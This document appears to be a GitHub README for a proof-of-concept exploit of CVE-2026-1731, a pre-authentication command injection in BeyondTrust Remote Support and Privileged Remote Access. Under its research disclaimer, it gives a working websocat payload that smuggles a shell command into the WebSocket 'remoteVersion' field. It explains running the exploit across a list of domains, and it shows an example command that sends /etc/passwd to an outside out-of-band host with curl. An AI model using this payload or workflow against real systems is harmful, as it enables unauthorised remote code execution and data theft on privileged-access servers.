# CVE-2026-1731 BeyondTrust Remote Support Pre-Auth RCE PoC

> [!WARNING]
> This script is intended for **educational and research purposes only**. Do not use it against systems without **explicit permission**. Unauthorized access or testing is illegal and unethical. Read the full [DISCLAIMER](DISCLAIMER.md) before using this script.

## Overview

This script demonstrates a critical command injection vulnerability (CVE-2026-1731) affecting **BeyondTrust Remote Support (RS)** and **Privileged Remote Access (PRA)**. The issue originates from the same WebSocket-reachable endpoint involved in the earlier high-profile **CVE-2024-12356**, making this a closely related variant.

The vulnerability exists because the server's `thin-scc-wrapper` script performs **arithmetic comparisons on attacker-controlled input**, specifically the `remoteVersion` value sent during the WebSocket handshake. Bash treats operands in numeric comparisons as **expressions**, not plain strings, which allows crafted payloads like `a[$(cmd)]0` to trigger **arbitrary command execution** during evaluation.

Even though BeyondTrust added a numeric sanity check in this patch cycle, it does not prevent Bash from performing expression evaluation later, leaving the endpoint exploitable. Attackers can gain code execution simply by opening a WebSocket connection and sending a malicious version value before authentication.

#### Payload

```bash
echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -
```

## Dependencies

```bash
pip3 install requests
```

#### Download websocat 

```bash
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat
```

(Place it in the same folder as your Python script.)

Or move it system-wide:

```bash
sudo mv websocat /usr/local/bin/
```
#### Create `domains.txt` in the same directory

Add the URLs you want to test:

```
example1.com
example2.com
example3.com
```

## Script Usage

Edit the following line in the script to configure the command you want the WebSocket exploit to execute:

```python
CMD = "YOUR-COMMAND-HERE"
```

For example:

```python
CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"
```

Once the command is set, run the script:

```bash
python3 exploit.py
```

Or make it executable and run it directly:

```bash
chmod +x exploit.py
./exploit.py
```


<img width="689" height="494" alt="1" src="https://github.com/user-attachments/assets/db94e909-0133-426b-ba3c-8df8844f7b67" />



<img width="1308" height="721" alt="2" src="https://github.com/user-attachments/assets/d79d8a38-3e53-4981-b483-469bbc319853" />


## Mitigation

* https://www.beyondtrust.com/trust-center/security-advisories/bt26-02

## Reference

* *Original analysis* - https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
